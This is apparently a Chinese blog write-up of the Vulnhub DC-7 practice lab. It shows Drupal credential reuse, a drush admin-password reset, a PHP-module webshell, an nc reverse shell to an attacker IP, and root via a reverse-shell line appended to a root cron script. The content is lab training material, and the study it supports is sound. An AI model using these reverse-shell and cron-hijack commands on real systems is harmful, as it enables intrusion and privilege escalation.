Vulnhub靶机渗透学习——DC-7

最新推荐文章于 2024-05-01 09:48:01 发布
最新推荐文章于 2024-05-01 09:48:01 发布
阅读量175 收藏
点赞数 1
分类专栏: Vulnhub靶机DC系列 文章标签: 学习 web安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45612828/article/details/133977700
版权

Vulnhub靶机

Vulnhub靶机下载:/
官网地址:https://download.vulnhub.com/dc/DC-7.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后使用VMware 打开即可。
DC-7:只有一个最终的flag,只有拿到root权限才可以发现最终的flag。

环境准备

攻击机:kali
靶机:DC-7
同一网卡

DC-7 靶机渗透

信息收集

kali里使用netdiscover发现主机(快一点)

netdiscover -i eth0 -r 192.168.0.0/24

image.png
当然也可以用 nmap探测整个虚拟机网段存活主机,发现靶机ip:

nmap -sP -PI -PT 192.168.0.1/24

image.png
使用 nmap 探测开放端口及服务

nmap -sCV 192.168.0.137 -p-

image.png
同样也是开放了 22 和 80 端口,浏览器访问 80
image.png
发现又是 Drupal,主页有一段话

DC-7引入了一些“新”概念,但我把它们留给你自己去弄清楚是什么。虽然这个挑战并不全是技术性的,但如果你需要诉诸暴力强迫或字典攻击,你可能不会成功。你要做的,就是跳出思维定势。“跳出”框框

回到靶场描述https://www.vulnhub.com/entry/dc-7,356/发现说的一样
image.png

审计泄露

这里作者的意思让我们跳出传统渗透思路,从白盒审计入手,在主页左下角有作者的名字,直接 google 搜索
image.png
发现其 github 及 twitter
image.png

这是DC-7挑战的一些“代码”(是的,它不是最好的代码,但这不是重点)。
顺便说一句,这不是一面旗帜,但如果你来到这里,无论如何都做得很好。:-)

发现其 githu 下只有一个项目,且给了是 DC-7 的一些源码,那就下载到本地审计一下,在 config.php 中先数据库账号密码
image.png

dc7user/MdR3xOgB7#dW

但是网站没有对外开放 3306,所以只能用此账号密码尝试网站登录或 ssh 登录
image.png
网站登录提示用户密码错误,那就只能尝试 ssh 登录
image.png
没想到就直接进入 shell 了,不过只是一个普通用户,收集下信息

sudo -l
find / -perm -u=s -type f 2>/dev/null

image.png
利用https://github.com/The-Z-Labs/linux-exploit-suggester扫内核漏洞发现有个高可能性的,但是由于靶场环境不能 gcc 编译,要运行 poc 得搭建同样的内核环境,太麻烦就没做尝试
image.png
继续翻找用户目录看看,在当前用户目录下,有个 backups 和 mbox,很熟悉进去看看发现两个.gpg 文件,没见过这类文件,不知道是干嘛的
image.png
于是问了下 chatgpt:大概意思是经过加密后的文件
image.png
在另一个文件 mbox 发现了些信息有个/opt/scripts/backups.sh 脚本文件
image.png
cat 查看一下
image.png
看不太懂,交给 chatgpt
image.png

Drush 重置管理员密码

这里尝试利用 drush 命令来修改网站 admin 用户密码

cd /var/www/html/

drush user-password admin --password="123456"

image.png
显示修改成功,进入网站登录看看
image.png

Drupal 8-getshell

成功进来了,然后呢,然后不知道咋搞了,参考其他大佬文章,直接添加 php 代码反弹 shell,但发现Drupal 8不支持PHP代码,为了安全,需要将php单独作为一个模块导入。
image.png

https://www.drupal.org/project/php   //Php介绍页面如下
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz //模块包下载地址

进入 extend 安装
image.png
image.png
选择FILTERS,勾选PHP点击Install安装,安装成功后会有提示
image.png
image.png
接下来就直接写 webshellimage.png
蚁剑连接
image.png
nc 反弹一手 shell 方便后续操作

nc -e /bin/bash 192.168.0.10 4444

image.png
老规矩 python 稳定 shell

which python
python -c 'import pty;pty.spawn("/bin/bash")'

image.png
现在用户变为了 www-date,依旧是普通权限

提权

接下来提权还是需要用到前面发现的 backups.sh 脚本,可以看一下所属用户和组
image.png
发现其所属 www-date组,www-date 用户可以对这个脚本文件进行操作,既然如此就写入 nc 反弹命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.0.10 4444 >/tmp/f" >> backups.sh

image.png
手动执行
image.png
image.png
这里不对啊,不能当前用户手动执行不然还是当前用户,参考大佬文章说,这个脚本由 root 用户定时 15 分钟执行一次,所以写入反弹命令后,开启监听静静等待其自动执行就可以了,从之前的那个 mbox 文件可以分析出来
image.png
等待其自动执行反弹 shell
image.png
这不就来了吗,顺便看了一下自动任务,果然

crontab -l

image.png

获取 flag

image.png

靶场总结

  1. 白盒源码审计泄露
  2. Drush 重置管理员密码
  3. Drupal 8 后台-getshell 方式
  4. 通过由 root 用户定时执行脚本提权

Never say die _
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机DC系列-DC-7
m0_54525483的博客
01-07 1366
Vulnhub靶机DC系列-DC-7 靶场名称:DC-7 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ 下载地址: ** DC-7.zip (Size: 939 MB) Download: http://www.five86.com/downloads/DC-7.zip Download (Mirror): https://download.vulnhub.com/dc/DC-7.zip Download (Torrent): https://download.v
DC7_靶场实战
JSH_CDX的博客
03-30 1342
DC7_靶场实战 我只是知识的搬运工 希望看完这篇博文你能解决问题
2024年最新【DC-7靶场渗透
最新发布
2401_84240454的博客
05-01 276
提权想到之前那个在/opt/scripts目录下的backups.sh脚本文件所属者是root,所属组是www-data,而当前用户正是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell。此时发现drupal8不支持php代码,但我们发现该页面中有个extend扩展模块,应该是可以导入php模块的, extend下点击install new module,然后根据提示写入php的安装脚本页面。资源较为敏感,未展示全面,需要的最下面获取。
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3192
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
DC-7 靶场学习
akxnxbshai的博客
03-15 440
DC-7 靶场学习
靶场练习第十五天~vulnhub靶场之dc-7
qq_57976347的博客
02-14 388
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.120 2.网站的信息收集 (1)靶机开放了80端口,先
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1052
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
入侵靶机DC-7
干铮的博客
10-08 1446
DC-7 1.主机发现 靶机开机后DHCP获取有ip地址 2.信息收集 端口扫描 C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±?? Nmap scan report for dc-7 (192.168.43.111) Host is up (0.00030s latency). Not s
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1181
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC靶机系列——DC-7练习
shenpanzhimao的博客
03-01 865
DC靶机系列——DC-7练习 DC-7的端口服务只有22和80端口,也就是ssh登录和web服务。 在探测web服务的过程中,没有找到相应的web漏洞。 这里就要想办法通过侧面来进攻,考验的是对信息的敏感性。发现有一个@DC7USER,放在谷歌搜索一下,发现一个twitter和github,在github里面存在敏感信息,猜测可能是ssh的密码,果然进入。 获取初步权限后,继续在低权限情况下进行信...
DC-7靶机进行渗透测试
zll___的博客
03-24 250
DC-7靶机进行渗透测试
DC-7靶场下载渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 2758
dc-7靶场详细渗透过程
Vulhub-DC-7靶场实战攻略
weixin_51339377的博客
03-17 206
arp-scan -l nmap -T4 -A 192.168.206.141 PS:ssh链接成功 接下来可以直接链接mysql 然后查看用户 改掉密码就可以登录后台了 也可以借鉴下面这个思路 通过drush重置密码 进入/var/www/html/ 目录下以后 由于是Drupal搭建的网站 计划任务用到了drush 可以尝试如下的命令重置登录密码和用户 drush user-password admin --password="abcdefg"...
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值